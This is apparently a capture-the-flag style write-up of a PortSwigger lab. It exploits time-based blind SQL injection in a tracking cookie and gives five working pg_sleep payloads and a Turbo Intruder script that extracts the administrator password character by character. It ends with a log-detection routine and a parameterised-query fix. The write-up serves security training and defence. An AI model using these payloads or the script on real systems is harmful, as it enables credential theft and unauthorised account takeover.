🗂️PortSwigger Lab Writeup: Blind SQL Injection with Time Delays and Information Retrieval
🎯 Objective
The objective of this lab is to exploit a time-based blind SQL injection vulnerability in a web application that executes a SQL query containing the tracking cookie in an unsafe way (the cookie is used to track users for analytics). Our goal is to extract the `administrator` password from the `users` table and log in as `administrator`.
- Lab URL: https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval
- Category: SQL Injection
- Difficulty: Practitioner
💉 Payloads Used
1. Confirming the blind SQL injection
- Payload 1 - ✅
`Add56jTZYwMEpBPU'||CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--`
2. Confirming that the `users` table exists
- Payload 2 - ✅
`Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)--`
3. Confirming that the `administrator` user exists in the `users` table
- Payload 3 - ✅
`Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--`
4. Determining the password length
- Payload 4 - ✅
`Add56jTZYwMEpBPU'||(SELECT CASE WHEN LENGTH(password)=#marker THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--`
5. Extracting the password
- Payload 5 - ✅
`Add56jTZYwMEpBPU'||(SELECT CASE WHEN SUBSTRING(password, ^POS^, 1)='^CHAR^' THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--`
🧪 Exploitation Steps
🕵️Step 1: Observe the Website
- Open the lab URL in your browser and explore its functionality.
- At first glance, the website appears to be a shopping site with an option to filter products by category, plus a login page. The lab description states that the vulnerability lies in the tracking cookie, which is used directly in a SQL query.
🔍Step 2: Find the Vulnerable Endpoint
- Open Burp Suite and send a request containing the `TrackingId` cookie to the Repeater tab with Ctrl + R.
- In the Repeater tab, we first verify that the endpoint is vulnerable to blind SQLi using a PostgreSQL-specific payload:
`Add56jTZYwMEpBPU'||CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--`
- After sending this payload, the response arrived with a 5-second delay, confirming that the backend uses a PostgreSQL database and that this is the vulnerable endpoint.
🧾Step 3: Confirm the details
- Before extracting the password, we should verify that the `users` table exists and that an `administrator` username exists in that table.
- We will use the payload `Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)--` to confirm whether the `users` table exists.
- The payload executed successfully, delaying the response and confirming the presence of the `users` table in the database.
- Now we will use the payload `Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--` to confirm whether the `administrator` user exists in the table.
- This payload also executed successfully, confirming the presence of the `administrator` record in the `users` table.
📏Step 4: Determine the password length
- Before extracting the password, we need to know the length of the `administrator` password so that the extraction payload can be crafted accordingly.
- To determine the length, send the request to the Intruder tab with Ctrl + I.
- We will use the payload `Add56jTZYwMEpBPU'||(SELECT CASE WHEN LENGTH(password)=#marker THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--`, where `#marker` is replaced by the payload position marker in Intruder.
- Use the Sniper attack type, in which Burp Suite sends one payload at a time, each with a different candidate password length. Set the payload type to Numbers with a range from 8 to 22, since passwords are generally 8-22 characters long.
- Finally, start the attack.
- Only the request with the length value 20 was returned after a 5-second delay, confirming that the payload executed successfully.
- Hence, it is confirmed that the password is 20 characters long.
🔓Step 5: Extract the password
- Here, I will be extracting the password using an extension in Burp Suite called Turbo Intruder, which fuzzes the application much faster than the normal Intruder in Burp Suite Community Edition.
- Info: Turbo Intruder is a Burp Suite extension designed for high-speed, customized HTTP request generation and analysis, which makes it ideal for blind SQLi brute-forcing.
- The default Intruder attack usually takes a very long time in Community Edition for this purpose, so we will use Turbo Intruder instead.
- First, install the Turbo Intruder extension from the BApp Store.
- Now send a request containing the `TrackingId` cookie to Turbo Intruder using Send to Turbo Intruder.
- We will use the payload `Add56jTZYwMEpBPU'||(SELECT CASE WHEN SUBSTRING(password, ^POS^, 1)='^CHAR^' THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--` to extract the password.
- Use the following script to send the requests to the application and identify the successful payloads. Since PortSwigger labs usually use lowercase alphanumerics in passwords, we limited the charset to `a-z0-9` for speed.

```python
import string

def queueRequests(target, wordlists):
    # Low concurrency keeps one sleeping request from skewing the timing of the others
    engine = RequestEngine(target.endpoint,
                           concurrentConnections=3,
                           requestsPerConnection=3,
                           pipeline=False,
                           timeout=10000000)
    max_len = 20                                        # password length found in Step 4
    charset = string.ascii_lowercase + string.digits    # a-z0-9
    # One request per (position, candidate character): 20 positions x 36 characters
    for pos in range(1, max_len + 1):
        for ch in charset:
            req = target.req.replace("^POS^", str(pos)).replace("^CHAR^", ch)
            engine.queue(req)

def handleResponse(req, interesting):
    # Keep only the responses that came back after the injected delay
    if req.time >= 5000000:
        table.add(req)
```

- After configuring everything, start the attack.
- Hence, we obtained the password character for each of the 20 positions.
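From the defender's side, the attack above appears in the web server's logs as a burst of requests sharing one `TrackingId` prefix, most of them carrying `pg_sleep()` and a subset arriving one sleep late. The detector below is an added example, not part of the original writeup; the log records are constructed, and the 16-character alphanumeric token shape is an assumption taken from the lab's cookie value.

```python
import re
from collections import defaultdict

# Constructed sample of the lab traffic as the server would log it:
# (TrackingId cookie value, response time in ms). Not real lab logs.
SAMPLE_LOG = [
    ("Add56jTZYwMEpBPU", 110),
    ("Add56jTZYwMEpBPU'||CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--", 5130),
    ("Add56jTZYwMEpBPU'||(SELECT CASE WHEN SUBSTRING(password, 1, 1)='a' THEN pg_sleep(5) "
     "ELSE pg_sleep(0) END FROM users WHERE username='administrator')--", 140),
    ("Add56jTZYwMEpBPU'||(SELECT CASE WHEN SUBSTRING(password, 1, 1)='b' THEN pg_sleep(5) "
     "ELSE pg_sleep(0) END FROM users WHERE username='administrator')--", 5120),
    ("kJh8vq2LpQ0xTzRn", 95),
]

# Delay primitives of common engines; pg_sleep is the PostgreSQL one used in the lab.
DELAY_FUNC = re.compile(r"\b(pg_sleep|sleep|benchmark|dbms_lock\.sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# A quote followed by concatenation, a comment or a boolean operator: the literal was closed.
QUOTE_BREAKOUT = re.compile(r"'\s*(\|\||--|;|\bor\b|\band\b)", re.I)
# The legitimate cookie is a 16-character alphanumeric token (assumed from the lab's value).
TOKEN_SHAPE = re.compile(r"^[A-Za-z0-9]{16}$")

def classify_cookie(value):
    """Return the reasons a TrackingId value looks like a time-based SQLi probe ([] if clean)."""
    reasons = []
    if not TOKEN_SHAPE.match(value):
        reasons.append("bad-token-shape")
    if QUOTE_BREAKOUT.search(value):
        reasons.append("quote-breakout")
    if DELAY_FUNC.search(value):
        reasons.append("delay-function")
    return reasons

def detect(records, slow_ms=4000):
    """Group flagged requests by the cookie's base token and count how many sat at the
    injected delay: many probes on one token with a slow subset is the extraction pattern."""
    stats = defaultdict(lambda: {"probes": 0, "slow": 0, "reasons": set()})
    for value, ms in records:
        reasons = classify_cookie(value)
        if not reasons:
            continue                                # ordinary analytics traffic
        entry = stats[value.split("'", 1)[0]]       # token before the injected quote
        entry["probes"] += 1
        entry["reasons"].update(reasons)
        if ms >= slow_ms:                           # lab payload sleeps 5 s on a true condition
            entry["slow"] += 1
    return dict(stats)
```

The `slow` count is the useful alert signal: a content filter alone misses a probe that is encoded differently, but a token that repeatedly answers at exactly the injected delay is hard to hide.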
🧑💼Step 6: Log in as Administrator
- Finally, open the login page and enter the administrator credentials extracted with Turbo Intruder to log in.
- And 💥 Boom! We got access to the admin account on the website.
- And finally, the lab is solved.
🧠 Conclusion
- This lab involves a blind SQL injection vulnerability, where the `TrackingId` cookie parameter is used to track users for analytics and the application concatenates the cookie directly into a SQL query without validation or sanitization.
- Since the application neither validates the user input nor uses prepared statements, it is vulnerable to SQL injection. This allowed us to send time-based payloads and confirm their execution on the backend.
- By testing different payloads, we were able to:
  - Confirm the vulnerability using `pg_sleep()` delay payloads.
  - Identify the backend database (PostgreSQL).
  - Verify the presence of the `users` table and the `administrator` user.
  - Determine the password length of the administrator account.
  - Extract the password one character at a time using Turbo Intruder.
  - Finally, use the obtained credentials to log in as `administrator`, gaining full system access.
- This lab highlights that time-based blind SQL injection is still very impactful, even when there is no visible change in the application's response, and it reinforces the importance of sanitizing all user input, including cookies.
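As an added example that is not part of the original writeup, here is the root cause and its fix side by side: an in-memory SQLite database stands in for the lab's PostgreSQL backend (the table and column names are assumed), with the cookie concatenated into the query versus passed as a bound parameter. Because `pg_sleep()` has no SQLite equivalent, the injected CASE changes the row count instead of the response time.

```python
import sqlite3

# Constructed demonstration of the lab's root cause: the TrackingId cookie is
# concatenated into SQL. SQLite stands in for PostgreSQL; the bug and the fix are
# the same. The injected CASE appends '' when its condition is true and 'x' when it
# is false, so the attacker-controlled condition decides whether the row matches.
GOOD_COOKIE = "Add56jTZYwMEpBPU"
PROBE_TRUE = GOOD_COOKIE + "'||(SELECT CASE WHEN (1=1) THEN '' ELSE 'x' END)--"
PROBE_FALSE = GOOD_COOKIE + "'||(SELECT CASE WHEN (1=2) THEN '' ELSE 'x' END)--"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (id TEXT PRIMARY KEY, hits INTEGER DEFAULT 0)")
    conn.execute("INSERT INTO tracking (id) VALUES (?)", (GOOD_COOKIE,))
    return conn

def track_vulnerable(conn, cookie):
    """The lab's pattern: the cookie becomes part of the statement text, so a quote
    inside it closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT COUNT(*) FROM tracking WHERE id = '" + cookie + "'"
    return conn.execute(sql).fetchone()[0]

def track_safe(conn, cookie):
    """Parameterised query: the driver passes the cookie as data, never as SQL text,
    so the whole string (quotes, '||', '--' and all) is simply compared against id."""
    sql = "SELECT COUNT(*) FROM tracking WHERE id = ?"
    return conn.execute(sql, (cookie,)).fetchone()[0]

def validate_cookie(cookie):
    """Defence in depth: reject anything that is not the expected 16-character token
    (shape assumed from the lab's cookie value) before it reaches the database."""
    return len(cookie) == 16 and cookie.isascii() and cookie.isalnum()
```

With the vulnerable query the true and false probes return different counts, which is exactly the oracle the lab turns into a timing side channel; with the bound parameter both probes simply fail to match any row.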